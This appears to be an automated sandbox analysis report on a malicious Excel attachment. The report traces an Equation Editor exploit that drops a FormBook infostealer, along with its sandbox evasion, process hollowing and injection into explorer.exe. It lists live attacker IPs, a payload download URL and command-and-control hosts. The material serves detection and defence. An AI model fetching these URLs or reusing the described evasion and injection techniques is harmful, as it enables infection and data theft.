          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe {path}
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: vbc.exe, explorer.exe
          Source: Binary string: explorer.pdb source: vbc.exe, 00000005.00000002.2171454972.00000000029A0000.00000040.00000001.sdmp
          Source: EME_PO.47563.xlsxInitial sample: OLE indicators vbamacros = False
          Source: EME_PO.47563.xlsxInitial sample: OLE indicators encrypted = True

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: vbc[1].exe.2.dr, SimpleTickerWindowsForms/SimpleTickerView.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: vbc.exe.2.dr, SimpleTickerWindowsForms/SimpleTickerView.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.vbc.exe.f90000.0.unpack, SimpleTickerWindowsForms/SimpleTickerView.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.2.vbc.exe.f90000.3.unpack, SimpleTickerWindowsForms/SimpleTickerView.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.vbc.exe.f90000.0.unpack, SimpleTickerWindowsForms/SimpleTickerView.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.2.vbc.exe.f90000.3.unpack, SimpleTickerWindowsForms/SimpleTickerView.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00219242 push esp; iretd
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041606D push ebp; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041A8E9 push ebx; iretd
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041825A push 3788F9D1h; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041620F pushad ; iretd
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B3F2 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B3FB push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B3A5 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B45C push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0040B53D push eax; iretd
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00414D3E push ss; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004035C8 push CD785CF3h; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041CDEF push dword ptr [8AC2C068h]; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A0DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028EDFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0009606D push ebp; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0009620F pushad ; iretd
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0009825A push 3788F9D1h; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0009B3A5 push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0009B3FB push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0009B3F2 push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0009B45C push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0008B53D push eax; iretd
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_000835C8 push CD785CF3h; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0009A8E9 push ebx; iretd
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_00094D3E push ss; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.47595624405
          Source: initial sampleStatic PE information: section name: .text entropy: 7.47595624405
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\Public\vbc.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ASP.NET_4.0.30319\NamesJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: EME_PO.47563.xlsxStream path 'EncryptedPackage' entropy: 7.9980105307 (max. 8.0)

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM_3Show sources
          Source: Yara matchFile source: 00000004.00000002.2133084587.0000000002638000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2436, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: vbc.exe, 00000004.00000002.2133189050.0000000002754000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: vbc.exe, 00000004.00000002.2133189050.0000000002754000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME8
          Source: vbc.exe, 00000004.00000002.2133189050.0000000002754000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: vbc.exe, 00000004.00000002.2133189050.0000000002754000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL8
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 00000000000885E4 second address: 00000000000885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 000000000008896E second address: 0000000000088974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004088A0 rdtsc
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\Public\vbc.exeWindow / User API: threadDelayed 960
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1100Thread sleep time: -360000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2680Thread sleep time: -3689348814741908s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2680Thread sleep time: -45000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2404Thread sleep time: -41500s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2332Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 2884Thread sleep time: -45000s >= -30000s
          Source: C:\Windows\SysWOW64\explorer.exe TID: 3000Thread sleep time: -38000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
          Source: vbc.exe, 00000004.00000002.2133189050.0000000002754000.00000004.00000001.sdmpBinary or memory string: VMware HDDm
          Source: vbc.exe, 00000004.00000002.2133189050.0000000002754000.00000004.00000001.sdmpBinary or memory string: VMware
          Source: vbc.exe, 00000004.00000002.2133189050.0000000002754000.00000004.00000001.sdmpBinary or memory string: VMWAREHDDm
          Source: vbc.exe, 00000004.00000002.2133189050.0000000002754000.00000004.00000001.sdmpBinary or memory string: VMWARE8
          Source: vbc.exe, 00000004.00000002.2133189050.0000000002754000.00000004.00000001.sdmpBinary or memory string: Cm%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\8
          Source: explorer.exe, 00000006.00000000.2148845473.0000000004234000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000006.00000002.2346897540.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.2148864605.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: vbc.exe, 00000004.00000002.2133189050.0000000002754000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II8
          Source: vbc.exe, 00000004.00000002.2133189050.0000000002754000.00000004.00000001.sdmpBinary or memory string: Cm"SOFTWARE\VMware, Inc.\VMware Tools8
          Source: vbc.exe, 00000004.00000002.2133189050.0000000002754000.00000004.00000001.sdmpBinary or memory string: QEMU8
          Source: explorer.exe, 00000006.00000000.2148839738.0000000004226000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD01dRom0
          Source: explorer.exe, 00000006.00000000.2148839738.0000000004226000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD01
          Source: explorer.exe, 00000006.00000000.2148813341.00000000041DB000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: vbc.exe, 00000004.00000002.2133189050.0000000002754000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: vbc.exe, 00000004.00000002.2133189050.0000000002754000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: vbc.exe, 00000004.00000002.2133189050.0000000002754000.00000004.00000001.sdmpBinary or memory string: VMwareHDDm
          Source: vbc.exe, 00000004.00000002.2133189050.0000000002754000.00000004.00000001.sdmpBinary or memory string: VMware
          Source: vbc.exe, 00000004.00000002.2133189050.0000000002754000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: vbc.exe, 00000004.00000002.2133189050.0000000002754000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: vbc.exe, 00000004.00000002.2133189050.0000000002754000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000006.00000002.2346924278.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: vbc.exe, 00000004.00000002.2133189050.0000000002754000.00000004.00000001.sdmpBinary or memory string: vmware8
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
          Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\explorer.exeProcess queried: DebugPort
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004088A0 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00409B10 LdrLoadDll,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00A126F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028F26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
          Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\explorer.exeProcess token adjusted: Debug
          Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 74.208.236.61 80
          Source: C:\Windows\explorer.exeNetwork Connect: 102.141.201.70 80
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80
          Source: C:\Windows\explorer.exeNetwork Connect: 67.195.197.25 80
          Source: C:\Windows\explorer.exeNetwork Connect: 209.126.13.151 80
          Source: C:\Windows\explorer.exeNetwork Connect: 156.235.143.6 80
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1388
          Source: C:\Windows\SysWOW64\explorer.exeThread register set: target process: 1388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\explorer.exe base address: F00000
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe {path}
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: vbc.exe, 00000005.00000002.2171454972.00000000029A0000.00000040.00000001.sdmpBinary or memory string: Proxy DesktopProgmanSoftware\Microsoft\Windows\CurrentVersion\RunOnce
          Source: explorer.exe, 00000006.00000000.2135630370.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: vbc.exe, 00000005.00000002.2171454972.00000000029A0000.00000040.00000001.sdmp, explorer.exe, 00000006.00000000.2135630370.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000002.2346897540.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.2135630370.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.2346887922.0000000000220000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2169851044.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2133207139.0000000003421000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2169870384.00000000002E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2346860528.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2133240259.000000000349B000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2169888431.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.2346887922.0000000000220000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2169851044.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2133207139.0000000003421000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2169870384.00000000002E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2346860528.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2133240259.000000000349B000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2169888431.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Windows Service1Windows Service1Masquerading111Input Capture1Security Software Discovery321Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsProcess Injection612Virtualization/Sandbox Evasion3LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer15Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools11Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol23SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information41Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncSystem Information Discovery113Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 323358 Sample: EME_PO.47563.xlsx Startdate: 26/11/2020 Architecture: WINDOWS Score: 100 39 www.thejakx.com 2->39 41 propage.beatstars.com 2->41 57 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->57 59 Malicious sample detected (through community Yara rule) 2->59 61 Antivirus detection for URL or domain 2->61 63 16 other signatures 2->63 11 EQNEDT32.EXE 12 2->11         started        16 EXCEL.EXE 37 17 2->16         started        signatures3 process4 dnsIp5 49 192.227.129.22, 49165, 80 AS-COLOCROSSINGUS United States 11->49 33 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 11->33 dropped 35 C:\Users\Public\vbc.exe, PE32 11->35 dropped 81 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->81 18 vbc.exe 2 5 11->18         started        37 C:\Users\user\Desktop\~$EME_PO.47563.xlsx, data 16->37 dropped file6 signatures7 process8 signatures9 51 Multi AV Scanner detection for dropped file 18->51 53 Tries to detect virtualization through RDTSC time measurements 18->53 55 Injects a PE file into a foreign processes 18->55 21 vbc.exe 18->21         started        process10 signatures11 65 Modifies the context of a thread in another process (thread injection) 21->65 67 Maps a DLL or memory area into another process 21->67 69 Sample uses process hollowing technique 21->69 71 Queues an APC in another process (thread injection) 21->71 24 explorer.exe 21->24 injected process12 dnsIp13 43 xjcg168.com 102.141.201.70, 49171, 80 sun-asnSC Seychelles 24->43 45 sbsfe-p11r.geo.mf0.yahoodns.net 67.195.197.25, 49170, 80 YAHOO-3US United States 24->45 47 12 other IPs or domains 24->47 73 System process connects to network (likely due to code injection or exploit) 24->73 28 explorer.exe 24->28         started        signatures14 process15 signatures16 75 Modifies the context of a thread in another process (thread injection) 28->75 77 Maps a DLL or memory area into another process 28->77 79 Tries to detect virtualization through RDTSC time measurements 28->79 31 cmd.exe 28->31         started        process17

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          EME_PO.47563.xlsx38%ReversingLabsDocument-Word.Exploit.CVE-2017-11882

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe25%ReversingLabsWin32.Trojan.Wacatac
          C:\Users\Public\vbc.exe25%ReversingLabsWin32.Trojan.Wacatac

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.2.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          cna-notary.com0%VirustotalBrowse
          www.8no3.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://192.227.129.22/vbc.exe100%Avira URL Cloudmalware
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.bestpodstudio.com/mz59/?rFN0=Xrx4qn&u2M0SF6h=z/+6kJk1ZiQzz1nPj4QpXoSyzw+77qJSyU9yqVlYEeNMvKLM5SL/kyHjrXfbl0j4G8KzAg==0%Avira URL Cloudsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
